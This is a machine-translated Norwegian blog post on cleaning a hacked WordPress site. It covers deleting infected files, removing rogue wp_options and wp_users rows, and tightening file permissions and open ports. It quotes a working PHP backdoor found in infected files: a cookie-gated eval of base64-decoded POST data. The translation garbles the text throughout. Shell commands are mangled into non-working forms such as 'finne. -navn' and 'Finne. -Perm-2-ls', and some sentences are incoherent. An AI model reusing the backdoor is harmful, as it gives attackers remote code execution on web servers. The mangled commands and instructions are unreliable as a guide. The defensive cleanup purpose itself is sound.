WordPress Utnytt - Rydd opp i virusfiler, SQL og serversikkerhet.

Før du leser dette innlegget, skal du se poste her, For å forstå noe. :)

Jeg fant det i flere bloggfiler på stealthsettings.com, koder som ligner på de nedenfor, som dukket opp som et resultat av viruset med bragden til WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcHvis det er over fil xmlrpc.php fra SleepyMen på et grep server, kan du se at det er ganske mange av sitt slag i kildekoden.

pppffiuuu

Rense infiserte filer:

Ooookkkk ...
1. Den beste løsningen, etter at det hadde backupOg renset med databasen er å tørk filer WordPress (du kan holde wp-config.php og filer som ikke er strengt relatert til wp-plattformen, etter at de er nøye sjekket) fra serveren og laste opp de originale fra versjonen 2.5.1 (Under dette gjør en WP versjonsoppgradering :)) http://wordpress.org/download/ . Tørk inkludert tema-filer hvis du ikke stoler på at deres omhyggelig kontroll.

Det synes å ha blitt påvirket og filer av temaene som ikke har vært brukt før på bloggen og bare endre tema, ikke løser problemet.

./andreea/wp-content/themes/default/index.php:

2. Søk etter og slett alle filer som inneholder: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg og fil wp-info.txt, hvis noen....

finne. -navn “* _new.php”
finne. -navn “* _old.php”
finne. -navn “* .jpgg”
finne. -navn “* _giff”
finne. -navn “* _pngg”
finne. -navn “wp-info.txt”

3. i / Tmp , Søk og slette mapper som tmpYwbzT2

SQL Rengjøring :

1. i tabell Tabell wp_options se om det er slette linjene: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Alt i wp_options, gå til active_plugins og slett om det er en plugin som ender i en av filtypene * _new.php, * _old.php, *. jpgg, *. GIFF, *. pngg eller hvis en annen utvidelse er mistenkt, sjekk nøye.

3. I tabell wp_users, Se om det er en bruker som ikke har skrevet noe i sin rett, kolonnen user_nicename. Slett denne brukeren, men husk nummeret i ID-kolonnen. Denne brukeren vil sannsynligvis bruke "WordPress"Ca user_login og synes å være laget på 00: 00: 00 0000-00-00.

4. Gå til Table wp_usermeta og slette alle linjene som tilhører ID ovenfor.

Etter at du har gjort denne SQL-oppryddingen, deaktiver og aktiver deretter et plugin. (i blogg -> Dashboard -> Plugins)

Sikker server:

1. Se hva kataloger og filer er "skrivbar"(chmod 777) og prøv å sette en chmod som ikke lenger vil tillate deres skriving på noe nivå. (chmod 644, for eksempel)

Finne. -Perm-2-ls

2. Se hva filene har litt sett suid eller sgid . Hvis du ikke bruker disse filene satt på dem chmod 0 eller avinstallere pakken at den inneholder. Er svært farlig, fordi de kjørerettigheter "gruppe"Eller"root"Og ikke med vanlig bruker rettighetene til å utføre denne filen.

finne /-type f-perm-04000-ls
finne /-type f-perm-02000-ls

3. Sjekk hvilke porter som er åpne og prøver å lukke eller sikre de som ikke er brukt.

netstat-an | grep-i lytte

Om det. Jeg ser Noen blogger er utestengt de Google Search og andre sier "Han gjorde dem bra!!!" . Vel, jeg ville ha gjort det for dem ... men hva sier du hvis Google begynner å forby alle områder forming  Er spam og sette trojanere (Trojan.Clicker.HTML) i informasjonskapsler?

Teknologiinteressert, jeg skriver med glede på StealthSettings.com siden 2006. Jeg har bred erfaring med operativsystemer: macOS, Windows og Linux, samt programmeringsspråk og bloggplattformer (WordPress) og for nettbutikker (WooCommerce, Magento, PrestaShop).

Hvordan » AntiVirus og sikkerhet » WordPress Utnytt - Rydd opp i virusfiler, SQL og serversikkerhet.

1 tanke på "WordPress Utnytt - Rydd opp i virusfiler, SQL og serversikkerhet. ”

Legg igjen en kommentar